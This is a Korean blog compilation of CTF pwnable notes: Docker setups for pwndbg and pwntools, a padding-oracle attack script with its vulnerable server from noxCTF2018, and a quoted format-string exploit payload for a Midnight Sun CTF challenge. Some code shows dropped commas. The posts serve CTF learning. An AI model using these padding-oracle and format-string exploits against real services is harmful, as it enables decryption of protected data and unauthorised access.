분류 전체보기

pwndbg + pwntools Docker

2020. 7. 20. 20:48

pwndbg 및 pwntool 세팅


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
FROM ubuntu:20.04
 
ENV DEBIAN_FRONTEND=noninteractive
 
RUN dpkg --add-architecture i386
RUN apt-get -y update --fix-missing && apt-get -y upgrade
RUN apt-get -y install libc6:i386 libncurses5:i386 libstdc++6:i386
RUN apt-get -y install socat gdb git gcc vim
RUN apt-get -y install gcc-multilib
 
RUN git clone https://github.com/pwndbg/pwndbg
WORKDIR pwndbg
RUN ./setup.sh
RUN apt-get -y install tmux
RUN apt-get -y install python3 libssl-dev libffi-dev build-essential
RUN apt-get -y install python3-pip
RUN python3 -m pip install --upgrade pwntools
RUN apt-get -y install
cs




gdb-peda 및 pwndbg + pwntool


1
docker build -t pwn16:0.0 `pwd`
cs


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
FROM ubuntu:16.04
 
ENV DEBIAN_FRONTEND=noninteractive
 
RUN dpkg --add-architecture i386
RUN apt-get -y update --fix-missing && apt-get -y upgrade
RUN apt-get -y install libc6:i386 libncurses5:i386 libstdc++6:i386
RUN apt-get -y install socat gdb git gcc vim
RUN apt-get -y install gcc-multilib
 
WORKDIR /root
RUN git clone https://github.com/pwndbg/pwndbg
WORKDIR /root/pwndbg
RUN ./setup.sh
WORKDIR /root
RUN git clone https://github.com/longld/peda.git ~/peda
RUN git clone https://github.com/scwuaptx/Pwngdb.git
RUN cp ./Pwngdb/.gdbinit ~/
 
RUN apt install netcat
RUN apt-get -y install tmux
RUN apt-get -y install python3 libssl-dev libffi-dev build-essential
RUN apt-get -y install python3-pip
RUN python3 -m pip install --upgrade pwntools
RUN apt-get -y install
RUN update-alternatives --install /usr/bin/python python /usr/bin/python3.5 1
cs


run 공유폴더 세팅


1
docker run -v C:/Users/`username`/Downloads/Dreamhack:/root/shared -it --name pwn16 pwn16:0.0 bash
cs


start 및 연결

1
2
docker start pwn16
docker exec -it pwn16 /bin/bash
cs






저장을 안해두니 다시 짜기 귀찮음;;

예제는 noxCTF2018 JavaCorporation


https://ctftime.org/task/6542



서버

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
import socket
import threading
import random
from Crypto.Cipher import AES
 
key = 'NotGonnaHappenAA'
 
class ThreadedServer(object):
    def __init__(self, host, port):
        self.host = host
        self.port = port
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind((self.host, self.port))
 
    def listen(self):
        self.sock.listen(20)
        while True:
            client, address = self.sock.accept()
            client.settimeout(60)
            threading.Thread(target = self.listenToClient,args = (client,address)).start()
 
    def getIV(self):
        return ''.join([chr(random.randrange(0256)) for i in range(16)])
 
    def encrypt(self, plaintext):
        iv = self.getIV()
        aes = AES.new(key, AES.MODE_CBC, iv)
        return iv + aes.encrypt(plaintext)
 
    def decrypt(self, ciphertext):
        aes = AES.new(key, AES.MODE_CBC, ciphertext[:16])
        return aes.decrypt(ciphertext[16:])
 
    def pkcs5(self, s):
        pad_len = ((-len(s)) % 16)
        if pad_len == 0:
            pad_len = 16
 
        return s + chr(pad_len) * pad_len
 
    def check_pad(self, s):
        pad_len = ord(s[-1])
        if pad_len > 16 or pad_len == 0:
            return False
 
        pad = s[-pad_len:]
        for byte in pad:
            if ord(byte) != pad_len:
                return False
 
        return True
 
    def listenToClient(self, client, address):
        while True:
            try:
                length = int(client.recv(2))
                if (length % 16 != 0 or length <= 16):
                    client.close()
                    break
                else:
                    ciphertext = client.recv(length)
                    plaintext = self.decrypt(ciphertext)
                    if self.check_pad(plaintext):
                        client.send('1')
                    else:
                        client.send('0')
 
            except Exception as e:
                print e
                client.close()
                return False
 
if __name__ == "__main__":
    ThreadedServer('0.0.0.0'3141).listen()
cs



어택

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
import socket
 
BLOCK_SIZE = 16
 
def check_pad(cipher):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect(('127.0.0.1'3141))
    sock.send(cipher)
    result = b""
    for i in range(0x20,0x40):
        result += sock.recv(1)
    sock.close()
    return result
    
def unpadding_pkcs7(block):
    len_b = len(block)
    n_padd = ord(block[-1])
    if(n_padd==0):
        raise ValueError('bad padding')
    for c in range(0, n_padd):
        if(n_padd != ord(block[len_b-1-c])):
            raise ValueError('bad padding')
            
    unpad_block = block[:-n_padd]
    return unpad_block
 
def get_nextBlock_decrypt(cipher, iv):
    knownP = b""
    for padding_len in range(1,BLOCK_SIZE+1):
        candiP = b""
        result = b""
        for startIdx in range(0x00x810x20):
            sendFeed = b""
            for i in range(startIdx,startIdx+0x20):
                makeIV = b"\x00"*(BLOCK_SIZE-padding_len) + bytes([i ^ (iv[-padding_len]) ^ padding_len])
                for j in range(0,len(knownP)):
                    makeIV += bytes([(iv[len(makeIV)]) ^ (knownP[j]) ^ padding_len])
                sendFeed += str(len(makeIV+cipher)).encode('utf-8')+makeIV+cipher # length send
            result += check_pad(sendFeed)
        print(result)
        candiP = result.decode().find("1")
        candiP= bytes([candiP])
        knownP = candiP + knownP
    return knownP
    
def OraclePaddingAttack(cipher):
    KnownP = b""
    ciphers = []
    for i in range(0len(cipher), BLOCK_SIZE):
        ciphers.append(cipher[i:i+BLOCK_SIZE])
    for i, c in enumerate(ciphers[1:]):
        preIV = ciphers[i]
        KnownP += get_nextBlock_decrypt(c, preIV)
        print(KnownP)
    return KnownP
 
cipher = open("Encrypted.txt","rb").read()
print("len : %d " % len(cipher))
plain = OraclePaddingAttack(cipher)
print(plain)
cs



https://github.com/mwielgoszewski/python-paddingoracle


from paddingoracle import BadPaddingException, PaddingOracle  
from pwn import *

r = remote('chal.noxale.com', 3141)

with open('Encrypted.txt', 'rb') as f:
    data = f.read()

iv = data[:16]
cipher = data[16:]

class PadBuster(PaddingOracle):  
    def __init__(self, **kwargs):
        super(PadBuster, self).__init__(**kwargs)

    def oracle(self, data, **kwargs):
        r.send(bytes(48))
        r.send(iv+data)
        if r.recv(1) == '0':
            raise BadPaddingException

padbuster = PadBuster()
value = padbuster.decrypt(cipher, block_size=16, iv=iv)
print('Decrypted: %r' % (value))     






1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
#!/usr/bin/env python2
# Author: Marco Bonelli - @mebeim
# Date  : 2020-04-04
 
# Basic idea:
# Copy the secret (4 bytes) from the stack to our guess variable (also on the stack) and pass the check.
#
#  %<N>d   normally this lets us print N characters total (a decimal int padded to N spaces).
#  %*25$d  lets us choose the value of N from the stack, we choose 25$ -> position of the secret value,
#          this will therefore print a number of chars equal to the secret value.
#  %16$n   will write the number of printed chars to our variable on the stack (position 16) that is then
#          compared with the secret.
#
# This will print *A LOT* of characters back (like 500MB of spaces), but works after trying a few times!
 
from pwn import *
 
HOST = 'pwn4-01.play.midnightsunctf.se'
PORT = 10004
EXE  = './pwn4'
 
if args.REMOTE:
    r = remote(HOST, PORT)
else:
    r = process(EXE)
 
r.recvuntil("user: ")
r.sendline("%*25$d%16$n")
r.recvuntil("code: ")
r.sendline(str(10))
r.recvuntil("logged: ")
 
r.clean(10)
r.interactive()
cs



FSB 이런것도 됨





'Pwnable!!' 카테고리의 다른 글

pwndbg + pwntools Docker  (0) 2020.07.20
코드분석 & 취약점분석시 지나치지 말아야할 것  (0) 2019.12.11
libc 주소에서 stack 주소 구하기  (0) 2019.12.11
pwntool aslr 옵션  (0) 2019.12.11
[PIE & Full RELRO] PIE Leak 하기  (0) 2019.10.10

IDA     : https://www.hex-rays.com/products/ida/support/freefiles/IDA_Pro_Shortcuts.pdf

https://malwareunicorn.org/workshops/idacheatsheet.html


Ghidra : https://ghidra-sre.org/CheatSheet.html?fbclid=IwAR27IisPZVYgFYPI5X0RE34_HnzYnRaM_F752iMLdTYp5y6QoN6dDmxZORU



'ETC' 카테고리의 다른 글

IDA 단축키  (0) 2019.11.09
python3 pyjail  (0) 2019.07.08
[Ubuntu] 서버포트열기  (0) 2019.04.29
스테가노그래피 툴  (0) 2019.04.05
TOOL  (0) 2018.08.03

AND 연산자 , OR 연산자


&&과 || 을 잘못써서 일어나는 취약점... 


겨우 이걸 못찾아서 5달동안 못푼 문제를 방금 깨달아서 갑자기 글 씁니다.... ㅠㅠ

'Pwnable!!' 카테고리의 다른 글

pwndbg + pwntools Docker  (0) 2020.07.20
FSB 스택값만큼 공백 출력  (0) 2020.04.05
libc 주소에서 stack 주소 구하기  (0) 2019.12.11
pwntool aslr 옵션  (0) 2019.12.11
[PIE & Full RELRO] PIE Leak 하기  (0) 2019.10.10

IDA를 이용해 libc 열기

__libc_start_main에 있는 main 호출문을 보면 environ을 인자로 전달하는데, 이 environ offset을 찾을 수 있음


libc_base + environ_offset에 환경변수 주소가 박혀있는데, 이게 결국 스택주소




pwntool aslr 옵션

2019. 12. 11. 17:12

process("binary", alsr=0)

+ Recent posts